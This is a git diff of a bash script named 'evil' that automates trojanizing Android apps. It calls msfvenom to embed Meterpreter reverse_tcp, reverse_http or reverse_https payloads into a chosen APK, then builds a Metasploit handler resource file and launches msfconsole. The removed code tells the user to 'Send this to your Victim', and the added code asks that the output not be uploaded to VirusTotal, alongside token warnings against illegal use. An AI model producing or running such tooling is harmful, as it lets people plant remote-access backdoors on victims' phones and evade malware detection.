Upgrade program

diff --git a/evil b/evil
--- a/evil
+++ b/evil
@@ -1,4 +1,5 @@
 #!/bin/bash
+# v_2.1
 #Color
 Red='\033[0;31m'   #Red
 g='\033[0;32m'     #Green
@@ -7,6 +8,9 @@ BBlue='\033[1;34m' #Bold Blue
 none='\033[0m'     #none/no color
 BG='\033[1;32m'    #Bold Green
 BR='\033[1;31m'    #Bold Red 
+Yel='\033[0;33m'       # Yellow
+BYel='\033[1;33m'      # Yellow
+
 #checking if root!
 if [ "$EUID" -ne 0 ]
   then 
@@ -19,19 +23,58 @@ if [ "$EUID" -ne 0 ]
        printf "                                                       \n"
   exit
 fi
+trap 'printf "\n";stop;exit 1' 2
 
-#package checking!
+stop() {
+
+capktool=$(ps aux | grep -o "apktool" | head -n1)
+czipalign=$(ps aux | grep -o "zipalign" | head -n1)
+capksigner=$(ps aux | grep -o "apksigner" | head -n1)
+cjarsigner=$(ps aux | grep -o "jarsigner" | head -n1)
+if [[ $czipalign == *'zipalign'* ]]; then
+pkill -f -2 zipalign > /dev/null 2>&1
+killall -2 zipalign > /dev/null 2>&1
+fi
+if [[ $capktool == *'apktool'* ]]; then
+pkill -f -2 apktool > /dev/null 2>&1
+killall -2 apktool > /dev/null 2>&1
+fi
+if [[ $capksigner == *'apksigner'* ]]; then
+pkill -f -2 apksigner > /dev/null 2>&1
+killall -2 apksigner > /dev/null 2>&1
+fi
+if [[ $cjarsigner == *'jarsigner'* ]]; then
+pkill -f -2 jarsigner > /dev/null 2>&1
+killall jarsigner > /dev/null 2>&1
+fi
 clear
+banner/evil2.sh
+echo
+printf "${BG}Thank-You for using Evil-Application!\nBye :)\n"
+}
+
+
+# dependencies
+dependencies() {
+if [[ -e infected.apk/lastexecute.txt ]]; then
+cat infected.apk/lastexecute.txt
+sleep 3
+fi
+clear
+./banner/evil.sh
+if [[ -e autometasploit.rc ]]; then
 printf "${BR}NEED CLEANUP\n"
-sudo rm autometasploit.rc
-sudo rm infected.apk/Infected.apk
-sudo rm infected.apk/lastexecute.txt
+rm autometasploit.rc
+fi
+if [[ -e infected.apk/Infected.apk ]]; then
+rm infected.apk/Infected.apk
+fi
+if [[ -e infected.apk/lastexecute.txt ]]; then
+rm infected.apk/lastexecute.txt
+fi
 sleep 1
 printf "${BG}CLEANED\n"
 sleep 1
-clear
-./banner/evil.sh
-sleep 3
 echo "Checking for the Packages!"
 if ! command -v apktool &> /dev/null
 then
@@ -101,264 +144,141 @@ printf "\n${BR}METASPLOIT-FRAMEWORK!!!${none}\n"
 echo ""
 sleep 3
 clear
-#Starting the point of script!
-cowsay "All package are installed"
+}
+banner() {
+clear
+banner/evil.sh
+printf ""
+}
+
+banner2() {
+clear
+banner/evil2.sh
+embed
+}
+
+embed() {
+printf "${BR}Please! Do not use this Tool for illegal purposes!\n"
+printf "Any illegal purpose of this Tool is your responsibility\n"
+printf "Test it on your own devices and network! H4cking is Illegal\n"
+printf "Please Do not upload the application on the virus total!\n"
 sleep 2
-clear
-printf "\n${BR}              Starting to make your payload!!!"
-printf "\nMake sure you application is located on 'original.apk' folder"
-printf "\nThe output will be located on the 'infected.apk'!!!${none}"
-sleep 10
-clear
-#making payload
-printf "\n${p}Starting apache2!"
-sudo service apache2 start
-sleep 2
-printf "\n${p}starting postgresql!${none}"
-sudo service postgresql start
-sleep 2
-clear
-printf  "\n${BBlue}Progress!${none}"
-sleep 3
-clear
-./banner/evil2.sh
-echo ""
-sleep 0.5
-printf "\n${Red}Make sure your Application are added to original.apk\n"
-sleep 1
-printf "infected.apk will be the output location file of your payload\n"
-sleep 1
-printf "Some of the application may be secured and not available to decompile\n"
-sleep 1
-printf "recomended Application are Release below 2017-2018\n${none}"
-sleep 1
 echo ""
 read -n 1 -s -r -p "Press any key to continue"
+sleep .05
+printf "${BG}\nOK.\n"
+sleep 0.2
+clear
+banner/evil2.sh
+sleep 0.2
 echo ""
-printf "\n${BG}=============================================${none}\n"
-echo "Application name! 'With .apk'"
-read apk
-printf "\n${BG}OK${none}\n"
-printf "\n${BG}=============================================${none}\n"
-echo "Network Ip!"
-read ip
-printf "\n${BG}OK${none}\n"
-printf "\n${BG}=============================================${none}\n"
-echo "Port forwarding! ex.'4444' "
-read port
-printf "\n${BG}OK${none}\n"
-printf "\n${BG}=============================================${none}\n"
-printf "$p###################\n"
-printf "$BG Type of Payload:\n"
-printf "$p###################\n"
+ls original.apk/
 echo ""
-printf "$p@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n"
-printf "$BR 1) 'android/meterpreter/reverse_tcp'\n"
-printf "$BR 2) 'android/meterpreter/reverse_http'\n"
-printf "$BR 3) 'android/meterpreter/reverse_https'\n"
-printf "$BR 4) 'Quit'                         $none\n"
-printf "$p@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n"
-printf "$BBlue'select: 1, 2, 3, and 4 to quit'$none\n"
-#Bash Menu Script Example
-PS3='Choose Your Payload type: '
-options=("1" "2" "3" "4")
-select opt in "${options[@]}"
-do
-    case $opt in
-        "1")
-            printf "$BG android/meterpreter/reverse_tcp\n"
-            printf "\n${BG}=============================================${none}\n"
-            sleep 2
-            clear
-            printf "${BR}"
-            cowsay "Infecting Application!"
-            #sudo xterm -e /bin/msfvenom -x original.apk/$apk -p android/meterpreter/reverse_tcp lhost=$ip lport=$port -o infected.apk/Payload.apk
-            sudo xterm -e /bin/sudo msfvenom -x original.apk/$apk -p android/meterpreter/reverse_tcp lhost=$ip lport=$port -o infected.apk/Infected.apk
-            printf "\n${BG}OK${none}\n"
-            sleep 1
-            clear
-            printf "${BBlue}"
-            cowsay "Done Building App"
-            printf "${none}"
-            printf "\n${BR}#Making autometasploit.rc${none}\n"
-            echo "use exploit/multi/handler
-set payload android/meterpreter/reverse_tcp
-set lhost $ip
-set lport $port
-exploit" > autometasploit.rc
-            echo "type: android/meterpreter/reverse_tcp
-apk: $apk
-ip: $ip
-port: $port
-" > infected.apk/lastexecute.txt
-            printf "${p}All Done!!!${none}\n"
-            printf "\n${BG}Done Building App. Send this to your Victim!!!${none}"
-            printf "\n${BG}OK${none}"
-            printf "\n${BG}OK${none}"
-            printf "\n${BG}OK${none}"
-            sleep 2
-            echo ""
-            printf "\n${BR}Dont use for Ilegal Purpose!!!${none}\n"
-            sleep 5
-            clear
-            printf "${g}apache2 shutdown\n"
-            sudo service apache2 stop
-            clear
-            printf "postgresql shutdown\n"
-            sudo service postgresql stop
-            sleep 1
-            clear
-            break
-            ;;
-        "2")
-            printf "$BG android/meterpreter/reverse_http\n"
-            printf "\n${BG}=============================================${none}\n"
-            sleep 2
-            clear
-            printf "${BR}"
-            cowsay "Infecting Application!"
-            #sudo xterm -e /bin/msfvenom -x original.apk/$apk -p android/meterpreter/reverse_http lhost=$ip lport=$port -o infected.apk/Payload.apk
-            sudo xterm -e /bin/sudo msfvenom -x original.apk/$apk -p android/meterpreter/reverse_http lhost=$ip lport=$port -o infected.apk/Infected.apk
-            printf "\n${BG}OK${none}\n"
-            sleep 1
-            clear
-            printf "${BBlue}"
-            cowsay "Done Building App"
-            printf "${none}"
-            printf "\n${BR}#Making autometasploit.rc${none}\n"
-            echo "use exploit/multi/handler
-set payload android/meterpreter/reverse_tcp
-set lhost $ip
-set lport $port
-exploit" > autometasploit.rc
-            echo "type: android/meterpreter/reverse_http
-apk: $apk
-ip: $ip
-port: $port
-" > infected.apk/lastexecute.txt
-            printf "${p}All Done!!!${none}\n"
-            printf "\n${BG}Done Building App. Send this to your Victim!!!${none}"
-            printf "\n${BG}OK${none}"
-            printf "\n${BG}OK${none}"
-            printf "\n${BG}OK${none}"
-            sleep 2
-            echo ""
-            printf "\n${BR}Dont use for Ilegal Purpose!!!${none}\n"
-            sleep 5
-            clear
-            printf "${g}apache2 shutdown\n"
-            sudo service apache2 stop
-            clear
-            printf "postgresql shutdown\n"
-            sudo service postgresql stop
-            sleep 1
-            clear
-            break
-            ;;
-        "3")
-            printf "$BG android/meterpreter/reverse_https\n"
-            printf "\n${BG}=============================================${none}\n"
-            sleep 2
-            clear
-            printf "${BR}"
-            cowsay "Infecting Application!"
-            #sudo xterm -e /bin/msfvenom -x original.apk/$apk -p android/meterpreter/reverse_https lhost=$ip lport=$port -o infected.apk/Payload.apk
-            sudo xterm -e /bin/sudo msfvenom -x original.apk/$apk -p android/meterpreter/reverse_https lhost=$ip lport=$port -o infected.apk/Infected.apk
-            printf "\n${BG}OK${none}\n"
-            sleep 1
-            clear
-            printf "${BBlue}"
-            cowsay "Done Building App"
-            printf "${none}"
-            printf "\n${BR}#Making autometasploit.rc${none}\n"
-            echo "use exploit/multi/handler
-set payload android/meterpreter/reverse_tcp
-set lhost $ip
-set lport $port
-exploit" > autometasploit.rc
-            echo "type: android/meterpreter/reverse_https
-apk: $apk
-ip: $ip
-port: $port
-" > infected.apk/lastexecute.txt
-            printf "${p}All Done!!!${none}\n"
-            printf "\n${BG}Done Building App. Send this to your Victim!!!${none}"
-            printf "\n${BG}OK${none}"
-            printf "\n${BG}OK${none}"
-            printf "\n${BG}OK${none}"
-            sleep 2
-            echo ""
-            printf "\n${BR}Dont use for Ilegal Purpose!!!${none}\n"
-            sleep 5
-            clear
-            printf "${g}apache2 shutdown\n"
-            sudo service apache2 stop
-            clear
-            printf "postgresql shutdown\n"
-            sudo service postgresql stop
-            sleep 1
-            clear
-            break
-            ;;
-        "4")
-            ./banner/evil2.sh
-            printf "\n${BG}Thanks for using Evil-Aplications!!!${none}\n"
-            exit
-            ;;
-        *) echo "invalid option $REPLY";;
-    esac
-done
-# Finish!
-./banner/evil2.sh
+read -p "Target Apk: " apk
 echo ""
-printf "\n${BG}Thanks for using Evil-Aplications!!!${none}\n"
+printf "${BG}=================\n"
+printf "| Payload Type! |\n"
+printf "${BG}=================\n"
 echo ""
-echo "Choose your option:"
-printf "${BG}M) Start Metasploit-FrameWork \n"
-printf "${BG}C) No. Just clean Everything! \n"
-printf "${BG}S) Start Evil Application again\n"
-printf "${BR}Q) Quit... \n" 
-printf "$p+=+=+=+=+=+=+=+=+=+=+=+=+=+=+${none}$BBlue\n"
-PS3='Select: '
-options=("m" "c" "s" "q")
-select opt in "${options[@]}"
-do
-    case $opt in
-        "m")
-            printf "${BG}Starting Metasploit!!!"
-            msfconsole -r autometasploit.rc
-            break
-            ;;
-        "c")
-            printf "\n${BG}OK${none}"
-            printf "\n${BR}ERR${none}"
-            printf "\n${BG}OK${none}"
-            sleep 2
-            clear
-            ./banner/evil2.sh
-            printf "$BG Cleaning!!!\n"
-            printf "$BR Thank You!!!\n"
-            printf "\n${BR}Bye!!!${none}\n"
-            break
-            ;;
-        "s")
-            printf "${BG}Starting Evil-Application!"
-            sleep 3
-            sudo ./evil
-            ;;
-        "q")
-            printf "\n${BG}OK${none}"
-            printf "\n${BR}ERR${none}"
-            printf "\n${BG}OK${none}"
-            sleep 3
-            clear
-            ./banner/evil2.sh
-            printf "$BG Cleaning!!!\n"
-            printf "$BR Thank You!!!\n"
-            printf "\n${BR}Bye!!!${none}\n"
-            break
-            ;;
-        *) echo "invalid option $REPLY";;
-    esac
-done
-exit
+printf "${BR}1${BG}) 'android/meterpreter/reverse_tcp'\n"
+printf "${BR}2${BG}) 'android/meterpreter/reverse_http'\n"
+printf "${BR}3${BG}) 'android/meterpreter/reverse_https'\n"
+printf "${BR}4${BG}) ${BG}'${BR}Quit${BG}'\n"
+echo ""
+read -p "Payload type: " payload
+echo ""
+if [[ $payload == 1 || $payload == 01 ]]; then
+load='android/meterpreter/reverse_tcp'
+elif [[ $payload == 2 || $payload == 02 ]]; then
+load='android/meterpreter/reverse_http'
+elif [[ $payload == 3 || $payload == 03 ]]; then
+load='android/meterpreter/reverse_https'
+elif [[ $payload == 4 || $payload == 04 ]]; then
+sleep 1
+banner/evil2.sh
+printf "${BG}Thank-You for using Evil-Application!\nBye :)\n"
+exit 1
+else
+printf "${BRed}[!] Invalid option!${clear}\n"
+fi
+
+read -p "IP Addr: " ip
+echo ""
+printf "Port ex: 4444\n"
+read -p "Port: " port
+echo ""
+printf "Creating Resources File\n"
+echo "use exploit/multi/handler" > autometasploit.rc
+echo "set payload $load" >> autometasploit.rc
+echo "set lhost $ip" >> autometasploit.rc
+echo "set lport $port" >> autometasploit.rc
+echo "exploit" >> autometasploit.rc
+
+sleep .05
+printf "${BG}Resources File created\n"
+# process...
+sleep 1
+clear
+banner/evil2.sh
+printf "${BG}payload-type=${BR}$load \n"
+printf "${BG}Host & Port=${BR}$ip:$port\n"
+printf "${BYel}Warning...\n"
+printf "${BYel}About to embed $apk with $ip:$port \n"
+xterm -T "Infecting $apk" -hold -geometry 95x28+1000+1000 -e "sudo msfvenom -x original.apk/$apk -p $load lhost=$ip lport=$port -o infected.apk/Infected.apk"
+if [[ -e infected.apk/Infected.apk ]]; then
+cowsay "App Successful"
+echo "app-name=$apk" > infected.apk/lastexecute.txt
+echo "host=$ip" >> infected.apk/lastexecute.txt
+echo "port=$port" >> infected.apk/lastexecute.txt
+echo "status=Success" >> infected.apk/lastexecute.txt
+else
+printf "App Doesn't supported to Embed"
+echo "app-name=$apk" > infected.apk/lastexecute.txt
+echo "host=$ip" >> infected.apk/lastexecute.txt
+echo "port=$port" >> infected.apk/lastexecute.txt
+echo "status=Failed" >> infected.apk/lastexecute.txt
+fi
+sleep 1
+clear
+banner/evil2.sh
+echo ""
+printf "${BR}Please! Do not use this Tool for illegal purposes!\n"
+printf "Any illegal purpose of this Tool is your responsibility\n"
+printf "Test it on your own devices and network! H4cking is Illegal\n"
+printf "Please Do not upload the application on the virus total!\n"
+echo ""
+read -n 1 -s -r -p "Press any key to continue"
+sleep 1
+exploit
+}
+
+exploit(){
+clear
+banner/evil2.sh
+printf "${BG}================\n"
+printf "${BG}| What's Next? |\n"
+printf "${BG}================\n"
+echo ""
+printf "1) Start Metasploit! \n"
+printf "2) Re-Run the Script! \n"
+printf "3) Exit\n"
+read -p "option: " opt
+
+if [[ $opt == 1 || $opt == 01 ]]; then
+printf "starting metasploit w autometasploit.rc "
+msfconsole --resource autometasploit.rc
+elif [[ $opt == 2 || $opt == 02 ]]; then
+./evil
+elif [[ $opt == 3 || $opt == 02 ]]; then
+banner/evil2.sh
+echo
+printf "${BG}Thank-You for using Evil-Application!\nBye :)\n"
+exit 1
+else
+printf "${BRed}[!] Invalid option!${clear}\n"
+fi
+}
+
+dependencies
+banner
+banner2
